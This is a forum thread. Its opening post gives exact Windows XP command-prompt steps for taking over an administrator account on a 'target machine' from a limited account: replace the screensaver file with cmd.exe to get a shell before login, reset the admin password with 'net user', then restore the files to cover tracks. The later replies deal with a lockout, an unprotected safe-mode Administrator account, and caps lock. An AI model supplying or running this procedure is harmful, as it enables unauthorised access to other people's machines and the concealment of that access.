How to hack windows XP admin password If you log into a limited account on your target machine and open up a dos prompt then enter this set of commands Exactly: cd\ *drops to root cd\windows\system32 *directs to the system32 dir mkdir temphack *creates the folder temphack copy logon.scr temphack\logon.scr *backsup logon.scr copy cmd.exe temphack\cmd.exe *backsup cmd.exe del logon.scr *deletes original logon.scr rename cmd.exe logon.scr *renames cmd.exe to logon.scr exit *quits dos Now what you have just done is told the computer to backup the command program and the screen saver file, then edits the settings so when the machine boots the screen saver you will get an unprotected dos prompt with out logging into XP. Once this happens if you enter this command minus the quotes "net user <admin account name here> password" If the Administrator Account is called Frank and you want the password blah enter this "net user Frank blah" and this changes the password on franks machine to blah and your in. Have fun p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks does it work??? and am i reading it wrong or does it say somethign about gettign a dos instead of a loading screen at boot ...how do i reverse this after i change my pass?

Crap it didnt post all of what i rit up lol ...i athcually didnt figure out the hack hear's the top part of what should of posted lol Ok so i was just browsing in med (map ediotr for san andreas) and noticed that when my caps was on it was wrightin in non caps and whne off it was caps ......also it like multi selects icons on your desktop when you jsut clcik one ....it's happnd before and si usually resolved by just logging off and re back on...but i logged offf and when i cam to go back onto my acount (the admin one with all my stuff on) the pass had changed and im locked out from it ...i luckly rememberd i had a spare acoutn set up and logged in on taht to post this for help anyhow if i do this BUT it's let me go back on now lol must of being soem temp reg ---- that ahd gone wrong Merged Post: This forum ahs crappy pot limit's lol
Go into Safe Mode Write this DOWN 1. Reboot computer 2. After w/e company or BIOS is displayed, press F8 3. Clicky safe mode 4. Click XP Home/Professional 5. Log in to the wittle Administrator account with no password.
I wonder if he tried turning caps lock on when he was typing in his password, like he said when it was on he typing regularly and when it was off he was in all caps. Probably wasn't letting him in because he was typing his password in all caps
